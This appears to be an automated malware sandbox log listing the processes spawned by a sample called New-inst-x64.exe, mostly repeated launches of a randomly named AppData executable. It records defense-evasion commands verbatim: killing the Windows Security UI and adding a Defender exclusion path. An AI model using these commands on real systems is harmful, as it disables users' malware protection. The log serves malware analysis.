      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net sessionJump to behavior
      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 sessionJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
